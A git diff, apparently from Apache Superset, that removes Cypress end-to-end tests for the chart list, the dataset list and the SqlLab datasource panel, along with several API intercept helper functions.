@@ -1,171 +0,0 @@
|
||||
/**
|
||||
* Licensed to the Apache Software Foundation (ASF) under one
|
||||
* or more contributor license agreements. See the NOTICE file
|
||||
* distributed with this work for additional information
|
||||
* regarding copyright ownership. The ASF licenses this file
|
||||
* to you under the Apache License, Version 2.0 (the
|
||||
* "License"); you may not use this file except in compliance
|
||||
* with the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* Unless required by applicable law or agreed to in writing,
|
||||
* software distributed under the License is distributed on an
|
||||
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
|
||||
* KIND, either express or implied. See the License for the
|
||||
* specific language governing permissions and limitations
|
||||
* under the License.
|
||||
*/
|
||||
import { CHART_LIST } from 'cypress/utils/urls';
|
||||
import { setGridMode, toggleBulkSelect } from 'cypress/utils';
|
||||
import {
|
||||
setFilter,
|
||||
interceptBulkDelete,
|
||||
interceptUpdate,
|
||||
interceptDelete,
|
||||
interceptFiltering,
|
||||
interceptFavoriteStatus,
|
||||
} from '../explore/utils';
|
||||
|
||||
function orderAlphabetical() {
|
||||
setFilter('Sort', 'Alphabetical');
|
||||
}
|
||||
|
||||
function openProperties() {
|
||||
cy.get('[aria-label="more"]').eq(0).click();
|
||||
cy.getBySel('chart-list-edit-option').click();
|
||||
}
|
||||
|
||||
function openMenu() {
|
||||
cy.get('[aria-label="more"]').eq(0).click();
|
||||
}
|
||||
|
||||
function confirmDelete() {
|
||||
cy.getBySel('delete-modal-input').type('DELETE');
|
||||
cy.getBySel('modal-confirm-button').click();
|
||||
}
|
||||
|
||||
function visitChartList() {
|
||||
interceptFiltering();
|
||||
interceptFavoriteStatus();
|
||||
cy.visit(CHART_LIST);
|
||||
cy.wait('@filtering');
|
||||
cy.wait('@favoriteStatus');
|
||||
}
|
||||
|
||||
describe('Charts list', () => {
|
||||
describe('common actions', () => {
|
||||
beforeEach(() => {
|
||||
visitChartList();
|
||||
});
|
||||
|
||||
it('should bulk delete correctly', () => {
|
||||
cy.createSampleCharts([0, 1, 2, 3]);
|
||||
|
||||
interceptBulkDelete();
|
||||
toggleBulkSelect();
|
||||
|
||||
// bulk deletes in card-view
|
||||
setGridMode('card');
|
||||
orderAlphabetical();
|
||||
|
||||
cy.getBySel('skeleton-card').should('not.exist');
|
||||
cy.getBySel('styled-card').contains('1 - Sample chart').click();
|
||||
cy.getBySel('styled-card').contains('2 - Sample chart').click();
|
||||
cy.getBySel('bulk-select-action').contains('Delete').click();
|
||||
confirmDelete();
|
||||
cy.wait('@bulkDelete');
|
||||
cy.getBySel('styled-card')
|
||||
.eq(1)
|
||||
.should('not.contain', '1 - Sample chart');
|
||||
cy.getBySel('styled-card')
|
||||
.eq(2)
|
||||
.should('not.contain', '2 - Sample chart');
|
||||
|
||||
// bulk deletes in list-view
|
||||
setGridMode('list');
|
||||
cy.get('.loading').should('not.exist');
|
||||
cy.getBySel('table-row').contains('3 - Sample chart').should('exist');
|
||||
cy.getBySel('table-row').contains('4 - Sample chart').should('exist');
|
||||
cy.get('[data-test="table-row"] input[type="checkbox"]').eq(0).click();
|
||||
cy.get('[data-test="table-row"] input[type="checkbox"]').eq(1).click();
|
||||
cy.getBySel('bulk-select-action').eq(0).contains('Delete').click();
|
||||
confirmDelete();
|
||||
cy.wait('@bulkDelete');
|
||||
cy.get('.loading').should('exist');
|
||||
cy.get('.loading').should('not.exist');
|
||||
cy.getBySel('table-row').eq(0).should('not.contain', '3 - Sample chart');
|
||||
cy.getBySel('table-row').eq(1).should('not.contain', '4 - Sample chart');
|
||||
});
|
||||
|
||||
it('should delete correctly in card mode', () => {
|
||||
cy.createSampleCharts([0, 1]);
|
||||
interceptDelete();
|
||||
|
||||
// deletes in card-view
|
||||
setGridMode('card');
|
||||
orderAlphabetical();
|
||||
|
||||
cy.getBySel('styled-card').contains('1 - Sample chart');
|
||||
openMenu();
|
||||
cy.getBySel('chart-list-delete-option').click();
|
||||
confirmDelete();
|
||||
cy.wait('@delete');
|
||||
cy.getBySel('styled-card')
|
||||
.contains('1 - Sample chart')
|
||||
.should('not.exist');
|
||||
});
|
||||
|
||||
it('should delete correctly in list mode', () => {
|
||||
cy.createSampleCharts([2, 3]);
|
||||
interceptDelete();
|
||||
cy.getBySel('sort-header').contains('Name').click();
|
||||
|
||||
// Modal closes immediately without this
|
||||
cy.wait(2000);
|
||||
|
||||
cy.getBySel('table-row').eq(0).contains('3 - Sample chart');
|
||||
cy.getBySel('delete').eq(0).click();
|
||||
confirmDelete();
|
||||
cy.wait('@delete');
|
||||
cy.get('.loading').should('exist');
|
||||
cy.get('.loading').should('not.exist');
|
||||
cy.getBySel('table-row').eq(0).should('not.contain', '3 - Sample chart');
|
||||
});
|
||||
|
||||
it('should edit correctly', () => {
|
||||
cy.createSampleCharts([0]);
|
||||
interceptUpdate();
|
||||
|
||||
// edits in card-view
|
||||
setGridMode('card');
|
||||
orderAlphabetical();
|
||||
cy.getBySel('skeleton-card').should('not.exist');
|
||||
cy.getBySel('styled-card').eq(0).contains('1 - Sample chart');
|
||||
|
||||
// change title
|
||||
openProperties();
|
||||
cy.getBySel('properties-modal-name-input').type(' | EDITED');
|
||||
cy.get('button:contains("Save")').click();
|
||||
cy.wait('@update');
|
||||
cy.getBySel('styled-card').eq(0).contains('1 - Sample chart | EDITED');
|
||||
|
||||
// edits in list-view
|
||||
setGridMode('list');
|
||||
// Wait for list view to fully render after mode change
|
||||
cy.get('.loading').should('not.exist');
|
||||
cy.getBySel('table-row').should('be.visible');
|
||||
// Target the specific row by chart title to avoid flakiness from row ordering
|
||||
cy.getBySel('table-row')
|
||||
.contains('1 - Sample chart | EDITED')
|
||||
.parents('[data-test="table-row"]')
|
||||
.find('[data-test="edit-alt"]')
|
||||
.click();
|
||||
cy.getBySel('properties-modal-name-input').clear();
|
||||
cy.getBySel('properties-modal-name-input').type('1 - Sample chart');
|
||||
cy.get('button:contains("Save")').click();
|
||||
cy.wait('@update');
|
||||
cy.getBySel('table-row').contains('1 - Sample chart').should('exist');
|
||||
});
|
||||
});
|
||||
});
|
||||
@@ -1,42 +0,0 @@
|
||||
/**
|
||||
* Licensed to the Apache Software Foundation (ASF) under one
|
||||
* or more contributor license agreements. See the NOTICE file
|
||||
* distributed with this work for additional information
|
||||
* regarding copyright ownership. The ASF licenses this file
|
||||
* to you under the Apache License, Version 2.0 (the
|
||||
* "License"); you may not use this file except in compliance
|
||||
* with the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* Unless required by applicable law or agreed to in writing,
|
||||
* software distributed under the License is distributed on an
|
||||
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
|
||||
* KIND, either express or implied. See the License for the
|
||||
* specific language governing permissions and limitations
|
||||
* under the License.
|
||||
*/
|
||||
|
||||
import { DATASET_LIST_PATH } from 'cypress/utils/urls';
|
||||
|
||||
describe('Dataset list', () => {
|
||||
before(() => {
|
||||
cy.visit(DATASET_LIST_PATH);
|
||||
});
|
||||
|
||||
xit('should open Explore on dataset name click', () => {
|
||||
cy.intercept('**/api/v1/explore/**').as('explore');
|
||||
cy.get('[data-test="listview-table"] [data-test="internal-link"]')
|
||||
.contains('birth_names')
|
||||
.click();
|
||||
cy.wait('@explore');
|
||||
cy.get('[data-test="datasource-control"] .title-select').contains(
|
||||
'birth_names',
|
||||
);
|
||||
cy.get('.metric-option-label').first().contains('COUNT(*)');
|
||||
cy.get('.column-option-label').first().contains('ds');
|
||||
cy.get('[data-test="fast-viz-switcher"] > div:not([role="button"]')
|
||||
.contains('Table')
|
||||
.should('be.visible');
|
||||
});
|
||||
});
|
||||
@@ -23,18 +23,6 @@ export function interceptFiltering() {
|
||||
cy.intercept('GET', `**/api/v1/chart/?q=*`).as('filtering');
|
||||
}
|
||||
|
||||
export function interceptBulkDelete() {
|
||||
cy.intercept('DELETE', `**/api/v1/chart/?q=*`).as('bulkDelete');
|
||||
}
|
||||
|
||||
export function interceptDelete() {
|
||||
cy.intercept('DELETE', `**/api/v1/chart/*`).as('delete');
|
||||
}
|
||||
|
||||
export function interceptFavoriteStatus() {
|
||||
cy.intercept('GET', '**/api/v1/chart/favorite_status/*').as('favoriteStatus');
|
||||
}
|
||||
|
||||
export function interceptUpdate() {
|
||||
cy.intercept('PUT', `**/api/v1/chart/*`).as('update');
|
||||
}
|
||||
@@ -43,32 +31,13 @@ export const interceptV1ChartData = (alias = 'v1Data') => {
|
||||
cy.intercept('**/api/v1/chart/data*').as(alias);
|
||||
};
|
||||
|
||||
export function interceptExploreJson(alias = 'getJson') {
|
||||
cy.intercept('POST', `**/superset/explore_json/**`).as(alias);
|
||||
}
|
||||
|
||||
export const interceptFormDataKey = () => {
|
||||
cy.intercept('POST', '**/api/v1/explore/form_data').as('formDataKey');
|
||||
};
|
||||
|
||||
export function interceptExploreGet() {
|
||||
function interceptExploreGet() {
|
||||
cy.intercept({
|
||||
method: 'GET',
|
||||
url: /.*\/api\/v1\/explore\/\?(form_data_key|dashboard_page_id|slice_id)=.*/,
|
||||
}).as('getExplore');
|
||||
}
|
||||
|
||||
export function setFilter(filter: string, option: string) {
|
||||
interceptFiltering();
|
||||
|
||||
cy.get(`[aria-label^="${filter}"]`).first().click();
|
||||
cy.get(`.ant-select-item-option[title="${option}"]`).first().click({
|
||||
force: true,
|
||||
});
|
||||
|
||||
cy.wait('@filtering');
|
||||
}
|
||||
|
||||
export function saveChartToDashboard(chartName: string, dashboardName: string) {
|
||||
interceptDashboardGet();
|
||||
interceptUpdate();
|
||||
|
||||
@@ -1,73 +0,0 @@
|
||||
/**
|
||||
* Licensed to the Apache Software Foundation (ASF) under one
|
||||
* or more contributor license agreements. See the NOTICE file
|
||||
* distributed with this work for additional information
|
||||
* regarding copyright ownership. The ASF licenses this file
|
||||
* to you under the Apache License, Version 2.0 (the
|
||||
* "License"); you may not use this file except in compliance
|
||||
* with the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* Unless required by applicable law or agreed to in writing,
|
||||
* software distributed under the License is distributed on an
|
||||
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
|
||||
* KIND, either express or implied. See the License for the
|
||||
* specific language governing permissions and limitations
|
||||
* under the License.
|
||||
*/
|
||||
import { selectResultsTab } from './sqllab.helper';
|
||||
|
||||
describe.skip('SqlLab datasource panel', () => {
|
||||
beforeEach(() => {
|
||||
cy.visit('/sqllab');
|
||||
});
|
||||
|
||||
// TODO the test below is flaky, and has been disabled for the time being
|
||||
// (notice the `it.skip`)
|
||||
it('creates a table preview when a database, schema, and table are selected', () => {
|
||||
cy.intercept('**/superset/table/**').as('tableMetadata');
|
||||
|
||||
// it should have dropdowns to select database, schema, and table
|
||||
cy.get('.sql-toolbar .Select').should('have.length', 3);
|
||||
|
||||
cy.get('.sql-toolbar .table-schema').should('not.exist');
|
||||
cy.get('[data-test="filterable-table-container"]').should('not.exist');
|
||||
|
||||
cy.get('.sql-toolbar .Select')
|
||||
.eq(0) // database select
|
||||
.within(() => {
|
||||
// note: we have to set force: true because the input is invisible / cypress throws
|
||||
cy.get('input').type('main{enter}', { force: true });
|
||||
});
|
||||
|
||||
cy.get('.sql-toolbar .Select')
|
||||
.eq(1) // schema select
|
||||
.within(() => {
|
||||
cy.get('input').type('main{enter}', { force: true });
|
||||
});
|
||||
|
||||
cy.get('.sql-toolbar .Select')
|
||||
.eq(2) // table select
|
||||
.within(() => {
|
||||
cy.get('input').type('birth_names{enter}', { force: true });
|
||||
});
|
||||
|
||||
cy.wait('@tableMetadata');
|
||||
|
||||
cy.get('.sql-toolbar .table-schema').should('have.length', 1);
|
||||
selectResultsTab().should('have.length', 1);
|
||||
|
||||
// add another table and check for added schema + preview
|
||||
cy.get('.sql-toolbar .Select')
|
||||
.eq(2)
|
||||
.within(() => {
|
||||
cy.get('input').type('logs{enter}', { force: true });
|
||||
});
|
||||
|
||||
cy.wait('@tableMetadata');
|
||||
|
||||
cy.get('.sql-toolbar .table-schema').should('have.length', 2);
|
||||
selectResultsTab().should('have.length', 2);
|
||||
});
|
||||
});
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user